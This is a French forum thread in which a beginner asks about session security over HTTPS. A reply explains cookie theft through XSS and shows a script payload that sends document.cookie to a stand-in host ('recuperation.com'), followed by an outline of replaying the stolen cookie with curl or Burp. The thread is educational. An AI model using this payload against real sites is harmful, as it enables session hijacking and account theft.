sécurité OWASP et Session ?

DavidGrignon

15 mai 2021 à 14:08:52

Bonjour à tous,

À propos de sécurité (des sessions)

Je suis en train de suivre le cours sur la sécurité OWASP

https://openclassrooms.com/.../6520013-empechez-le...

je suis qu’à la deuxième leçon

mais je ne suis pas sûr de comprendre. Je suis Newbie alors un peu de tolérence

Je me demande au niveau de la sécurité des sessions.

Si mon site est bien Https et que pour authentifier une session j'utilise un cookie de session où se situe la faille de sécurité ?

A priori les Cookies de session sont bien protégés grâce au protocole SSL donc normalement pas lisible.

Pour authentifier la session, je pourrais simplement utiliser par exemple :

if(isset($_SESSION['username'])) ?

oui ou non ?

En vous remerciant

-Crixus-

18 mai 2021 à 16:16:31

Le vole de cookie c'est du XSS.

Une faille pourrait être dans un chat sans sécurité (comme htmlspecialchar) une injection.

    <script type="text/javascript">
       document.location.href="http://recuperation.com?cookie"+document.cookie;
   </script>

Après soit tu codes un petit programme, soit tu utilises Curl, soit tu utilises BURP et tu te fait une requête HTTP ou tu set les cookie avec la valeur que tu as récupéré

GET /index.html HTTP/1.1
Content-type: text/html
Set-Cookie: session=easy

Apparement sur le lien que tu as partagé, a la connection du mec ils enregistre son ip et son navigateur. Quand il fait une requête il verifie que le cookie+le navigateur+ l'ip sont les même que lors de la première connection, creation de session.

-
Edité par -Crixus- 18 mai 2021 à 16:30:57

"Etre vrai, peu le peuvent."
Friedrich Nietzsche